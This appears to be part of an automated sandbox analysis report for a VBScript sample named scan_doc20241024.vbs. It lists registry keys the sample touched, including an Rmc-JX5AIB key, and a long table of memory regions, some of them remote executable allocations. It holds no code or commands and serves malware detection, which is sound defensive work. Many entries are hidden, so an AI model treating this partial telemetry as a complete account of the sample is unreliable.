HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

HKEY_CURRENT_USER\SOFTWARE\Rmc-JX5AIB

licence

HKEY_CURRENT_USER\SOFTWARE\Rmc-JX5AIB

time

There are 6 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

1CFDFD7E000

trusted library allocation

page read and write

CD5000

heap

page read and write

400000

remote allocation

page execute and read and write

AF0000

heap

page read and write

1CFCFF33000

trusted library allocation

page read and write

A75727B000

stack

page read and write

1CFCE273000

heap

page read and write

A7580CB000

stack

page read and write

1CFD1F5A000

trusted library allocation

page read and write

24D8214E000

heap

page read and write

1ECDB274000

trusted library allocation

page read and write

294F000

stack

page read and write

1ECD9140000

heap

page read and write

1ECDAE92000

trusted library allocation

page read and write

2550000

heap

page read and write

24D83B0B000

heap

page read and write

1CFCE2A7000

heap

page read and write

945237E000

stack

page read and write

7FFB1E100000

unkown

page read and write

24D8210E000

heap

page read and write

945247E000

stack

page read and write

24D83B16000

heap

page read and write

1ECD91CB000

heap

page read and write

24D83B16000

heap

page read and write

24D8219A000

heap

page read and write

94522FF000

stack

page read and write

7FFAACE80000

trusted library allocation

page read and write

A00000

heap

page read and write

A75824D000

stack

page read and write

A7573FE000

stack

page read and write

24D8213C000

heap

page read and write

7FFAACEC0000

trusted library allocation

page read and write

CEA0BFE000

stack

page read and write

1ECD92B5000

heap

page read and write

1ECDB144000

trusted library allocation

page read and write

7FFAACD50000

trusted library allocation

page read and write

1ECDB1A7000

trusted library allocation

page read and write

A7571F7000

stack

page read and write

945297E000

stack

page read and write

1CFD00F2000

trusted library allocation

page read and write

1CFD335E000

trusted library allocation

page read and write

1CFD0132000

trusted library allocation

page read and write

1CFD4163000

trusted library allocation

page read and write

1ECDAE81000

trusted library allocation

page read and write

1ECDAE9B000

trusted library allocation

page read and write

24D8216B000

heap

page read and write

1ECD91CD000

heap

page read and write

24D83B0E000

heap

page read and write

24D83B16000

heap

page read and write

CEA0EFD000

stack

page read and write

9451FFE000

stack

page read and write

CEA0CFE000

stack

page read and write

1ECDAD40000

heap

page execute and read and write

1ECDB402000

trusted library allocation

page read and write

1CFCE2A5000

heap

page read and write

7FFB1E3A0000

unkown

page readonly

24D82115000

heap

page read and write

1CFCE454000

heap

page read and write

1CFD0102000

trusted library allocation

page read and write

1CFD5645000

trusted library allocation

page read and write

1ECD9224000

heap

page read and write

24D82350000

heap

page read and write

A75814D000

stack

page read and write

1ECF3383000

heap

page read and write

A756BEF000

stack

page read and write

1ECDB40C000

trusted library allocation

page read and write

1ECD9194000

heap

page read and write

24D82355000

heap

page read and write

1ECF31A1000

heap

page read and write

CB0000

heap

page read and write

7FFAACC70000

trusted library allocation

page execute and read and write

B5E000

stack

page read and write

1ECDABD5000

heap

page read and write

24D821BD000

heap

page read and write

1ECDAD60000

heap

page execute and read and write

69C000

stack

page read and write

9452A7E000

stack

page read and write

A757179000

stack

page read and write

7FFAACD64000

trusted library allocation

page read and write

7FFAACDE0000

trusted library allocation

page read and write

24D8215A000

heap

page read and write

1CFD3C3C000

trusted library allocation

page read and write

CEA09FE000

stack

page read and write

1ECF3290000

heap

page read and write

274F000

stack

page read and write

24D820FC000

heap

page read and write

7FFAACD80000

trusted library allocation

page execute and read and write

24D81FE0000

heap

page read and write

1CFD010A000

trusted library allocation

page read and write

1ECF3373000

heap

page read and write

1CFDFD11000

trusted library allocation

page read and write

1ECD9190000

heap

page read and write

1CFCFC00000

trusted library section

page read and write

A756E7E000

stack

page read and write

24D821A8000

heap

page read and write

1CFCE450000

heap

page read and write

24D83C80000

heap

page read and write

A756EFE000

stack

page read and write

7FFAACE90000

trusted library allocation

page read and write

1CFD5785000

trusted library allocation

page read and write

1ECF337E000

heap

page read and write

AE0000

heap

page read and write

24D83B16000

heap

page read and write

24D820D8000

heap

page read and write

1CFCFD00000

heap

page read and write

7FFAACEB0000

trusted library allocation

page read and write

A75747E000

stack

page read and write

BA0000

heap

page read and write

24D8235B000

heap

page read and write

1ECDB2B4000

trusted library allocation

page read and write

24D83B00000

heap

page read and write

24D83B26000

heap

page read and write

24D82159000

heap

page read and write

1CFCE260000

heap

page read and write

24D82127000

heap

page read and write

C00000

heap

page read and write

1ECDB2F9000

trusted library allocation

page read and write

945277E000

stack

page read and write

AE5000

heap

page read and write

7FFAACD6A000

trusted library allocation

page read and write

7FFAACBC0000

trusted library allocation

page read and write

A75737E000

stack

page read and write

1ECDAE84000

trusted library allocation

page read and write

1ECD9155000

heap

page read and write

A75804A000

stack

page read and write

24D82161000

heap

page read and write

24D82359000

heap

page read and write

24D82147000

heap

page read and write

1CFD015A000

trusted library allocation

page read and write

1ECD9240000

heap

page read and write

1ECF30F4000

heap

page read and write

1CFD5009000

trusted library allocation

page read and write

24D8213E000

heap

page read and write

1CFCFCE0000

heap

page execute and read and write

24D8215C000

heap

page read and write

1ECDB2A7000

trusted library allocation

page read and write

1CFD4D10000

trusted library allocation

page read and write

1CFCE2EB000

heap

page read and write

7FFAACC96000

trusted library allocation

page execute and read and write

A756BAD000

stack

page read and write

1CFD1F5E000

trusted library allocation

page read and write

1CFCE2E7000

heap

page read and write

1CFD540A000

trusted library allocation

page read and write

94525FE000

stack

page read and write

1ECDAD71000

trusted library allocation

page read and write

1CFCE400000

heap

page read and write

1CFE1B55000

trusted library allocation

page read and write

CBB000

heap

page read and write

24D8213C000

heap

page read and write

7FFAACCD0000

trusted library allocation

page execute and read and write

7FFAACD92000

trusted library allocation

page read and write

1CFD155A000

trusted library allocation

page read and write

1ECD92BE000

heap

page read and write

1CFCE120000

heap

page read and write

1ECDAE95000

trusted library allocation

page read and write

7FFAACC60000

trusted library allocation

page read and write

7FFAACDA0000

trusted library allocation

page execute and read and write

24D8211E000

heap

page read and write

1CFD4BA1000

trusted library allocation

page read and write

945267E000

stack

page read and write

1ECDAE98000

trusted library allocation

page read and write

1ECEAD80000

trusted library allocation

page read and write

1ECD9290000

trusted library allocation

page read and write

24D81F00000

heap

page read and write

2560000

heap

page read and write

1ECD90D0000

heap

page read and write

1CFD4E8F000

trusted library allocation

page read and write

1CFCE3E0000

trusted library allocation

page read and write

1CFCE360000

heap

page read and write

7FFAACE70000

trusted library allocation

page read and write

1ECD92A0000

heap

page readonly

1ECF3600000

heap

page read and write

A757FCD000

stack

page read and write

7FFB1E105000

unkown

page readonly

1ECEADDD000

trusted library allocation

page read and write

1CFCFD90000

trusted library allocation

page read and write

1CFD48C2000

trusted library allocation

page read and write

24D83B16000

heap

page read and write

BFE000

stack

page read and write

1ECDAB50000

heap

page read and write

24D8211E000

heap

page read and write

7FFAACE40000

trusted library allocation

page read and write

1ECDB171000

trusted library allocation

page read and write

7FFAACE20000

trusted library allocation

page read and write

A7572F9000

stack

page read and write

24D8215F000

heap

page read and write

24D82000000

heap

page read and write

7FFAACDC0000

trusted library allocation

page read and write

1ECD8FF0000

heap

page read and write

1CFCFCC0000

heap

page execute and read and write

7DF4006B0000

trusted library allocation

page execute and read and write

24D82189000

heap

page read and write

24D821B2000

heap

page read and write

1CFDFFF0000

trusted library allocation

page read and write

24D82187000

heap

page read and write

1CFD5B20000

trusted library allocation

page read and write

7FFAACEA0000

trusted library allocation

page read and write

1CFE0A07000

trusted library allocation

page read and write

1CFCE3A0000

trusted library allocation

page read and write

1ECDAE0D000

trusted library allocation

page read and write

24D82155000

heap

page read and write

24D821AF000

heap

page read and write

CEA050A000

stack

page read and write

1ECD914C000

heap

page read and write

1ECD92B0000

heap

page read and write

24D8235C000

heap

page read and write

CEA10FE000

stack

page read and write

1ECD923B000

heap

page read and write

B9D000

stack

page read and write

24D8213E000

heap

page read and write

24D8217D000

heap

page read and write

1ECDAD8D000

trusted library allocation

page read and write

CEA08FE000

stack

page read and write

7FFAACDB0000

trusted library allocation

page read and write

1CFD00FC000

trusted library allocation

page read and write

7FFB1E3B6000

unkown

page readonly

24D8219A000

heap

page read and write

7FFAACED0000

trusted library allocation

page read and write

1CFCFD04000

heap

page read and write

A756F7A000

stack

page read and write

1ECDABD0000

heap

page read and write

1ECDB40E000

trusted library allocation

page read and write

A75757B000

stack

page read and write

7FFB1E0E0000

unkown

page readonly

24D83B06000

heap

page read and write

24D82145000

heap

page read and write

1CFCFD06000

heap

page read and write

1ECD9188000

heap

page read and write

1CFCE29F000

heap

page read and write

24D83B26000

heap

page read and write

1ECDAED6000

trusted library allocation

page read and write

1CFD566D000

trusted library allocation

page read and write

1ECD9270000

trusted library allocation

page read and write

7FFAACDD0000

trusted library allocation

page read and write

24D8214A000

heap

page read and write

24D82168000

heap

page read and write

1CFCE200000

heap

page read and write

94526FE000

stack

page read and write

A7570FE000

stack

page read and write

1CFCE3D0000

heap

page readonly

1CFCE268000

heap

page read and write

24D82162000

heap

page read and write

79C000

stack

page read and write

24D83B16000

heap

page read and write

1CFD010E000

trusted library allocation

page read and write

24D8217D000

heap

page read and write

1CFD55B0000

trusted library allocation

page read and write

1CFD571E000

trusted library allocation

page read and write

CEA11FC000

stack

page read and write

1ECDB15C000

trusted library allocation

page read and write

1ECF3267000

heap

page execute and read and write

1ECDAAD0000

trusted library allocation

page read and write

24D82143000

heap

page read and write

24D8211E000

heap

page read and write

24D82151000

heap

page read and write

1CFD50A1000

trusted library allocation

page read and write

1ECD9183000

heap

page read and write

1ECF315B000

heap

page read and write

A7581CC000

stack

page read and write

7FFAACBB4000

trusted library allocation

page read and write

A757F4E000

stack

page read and write

1ECF3370000

heap

page read and write

1CFD0158000

trusted library allocation

page read and write

24D82167000

heap

page read and write

24D83B02000

heap

page read and write

1ECF30B0000

heap

page read and write

7FFAACE00000

trusted library allocation

page read and write

24D82154000

heap

page read and write

24D8213E000

heap

page read and write

24D821B8000

heap

page read and write

1CFCE220000

heap

page read and write

24D83B01000

heap

page read and write

24D8216A000

heap

page read and write

1CFCE2BF000

heap

page read and write

7FFAACBB3000

trusted library allocation

page execute and read and write

24D821B8000

heap

page read and write

7FFAACE30000

trusted library allocation

page read and write

24D83B16000

heap

page read and write

1CFDFFF2000

trusted library allocation

page read and write

24D8217D000

heap

page read and write

24D8217D000

heap

page read and write

284F000

stack

page read and write

24D8217D000

heap

page read and write

1CFD575F000

trusted library allocation

page read and write

24D83B03000

heap

page read and write

1CFCE2AD000

heap

page read and write

1ECDB08E000

trusted library allocation

page read and write

24D82155000

heap

page read and write

1ECEAD71000

trusted library allocation

page read and write

467000

remote allocation

page execute and read and write

7FFAACDF0000

trusted library allocation

page read and write

24D83B26000

heap

page read and write

1CFD0B5A000

trusted library allocation

page read and write

945257F000

stack

page read and write

1ECDAE7E000

trusted library allocation

page read and write

1ECD91D1000

heap

page read and write

1CFD3CC6000

trusted library allocation

page read and write

7FFB1E3A1000

unkown

page execute read

7FFAACBBD000

trusted library allocation

page execute and read and write

94524FD000

stack

page read and write

1CFCFD11000

trusted library allocation

page read and write

46B000

remote allocation

page execute and read and write

1CFE0007000

trusted library allocation

page read and write

7FFB1E0E1000

unkown

page execute read

24D82171000

heap

page read and write

24D820D0000

heap

page read and write

9452AFC000

stack

page read and write

7FFAACE10000

trusted library allocation

page read and write

24D821AA000

heap

page read and write

1CFD00FE000

trusted library allocation

page read and write

1ECF3260000

heap

page execute and read and write

1ECD922D000

heap

page read and write

A7574FE000

stack

page read and write

24D8217D000

heap

page read and write

1ECD918E000

heap

page read and write

7FFB1E3C5000

unkown

page readonly

1ECD923E000

heap

page read and write

1ECF3167000

heap

page read and write

7FFAACE50000

trusted library allocation

page read and write

24D8213D000

heap

page read and write

24D82142000

heap

page read and write

1CFD295E000

trusted library allocation

page read and write

9452273000

stack

page read and write

1CFD53E4000

trusted library allocation

page read and write

1ECD90F0000

heap

page read and write

24D8217D000

heap

page read and write

1ECDB195000

trusted library allocation

page read and write

7FFAACD61000

trusted library allocation

page read and write

7FFB1E0F6000

unkown

page readonly

1CFCE3C0000

trusted library allocation

page read and write

7FFAACBB2000

trusted library allocation

page read and write

94523FE000

stack

page read and write

7FFB1E3C2000

unkown

page readonly

1ECF30B6000

heap

page read and write

1ECDB182000

trusted library allocation

page read and write

CDC000

heap

page read and write

1CFCFC60000

trusted library allocation

page read and write

7FFB1E3C0000

unkown

page read and write

1CFD0136000

trusted library allocation

page read and write

1CFD5711000

trusted library allocation

page read and write

1ECDB16F000

trusted library allocation

page read and write

1CFD4285000

trusted library allocation

page read and write

24D82162000

heap

page read and write

A756B23000

stack

page read and write

A756FFF000

stack

page read and write

A75707E000

stack

page read and write

1CFD4581000

trusted library allocation

page read and write

1ECDAED0000

trusted library allocation

page read and write

1CFD45A9000

trusted library allocation

page read and write

7FFAACBCC000

trusted library allocation

page read and write

1CFD572C000

trusted library allocation

page read and write

24D8212E000

heap

page read and write

7FFAACE60000

trusted library allocation

page read and write

1CFE1407000

trusted library allocation

page read and write

1ECDB254000

trusted library allocation

page read and write

7FFAACC66000

trusted library allocation

page read and write

1ECDADDB000

trusted library allocation

page read and write

1CFDFFF8000

trusted library allocation

page read and write

24D82358000

heap

page read and write

1ECF3128000

heap

page read and write

1CFD4FEA000

trusted library allocation

page read and write

1CFD3F02000

trusted library allocation

page read and write

1ECD91A4000

heap

page read and write

24D82172000

heap

page read and write

7FFB1E102000

unkown

page readonly

24D82162000

heap

page read and write

24D820FB000

heap

page read and write

CEA0FFE000

stack

page read and write

24D83B0E000

heap

page read and write

7FFAACC6C000

trusted library allocation

page execute and read and write

1CFD56BC000

trusted library allocation

page read and write

1ECDB284000

trusted library allocation

page read and write

7FFAACD70000

trusted library allocation

page execute and read and write

There are 363 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
scan_doc20241024.vbs

Files

Processes

URLs

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportscan_doc20241024.vbs

Files

Processes

URLs

IPs

Registry

Memdumps

IOC Report
scan_doc20241024.vbs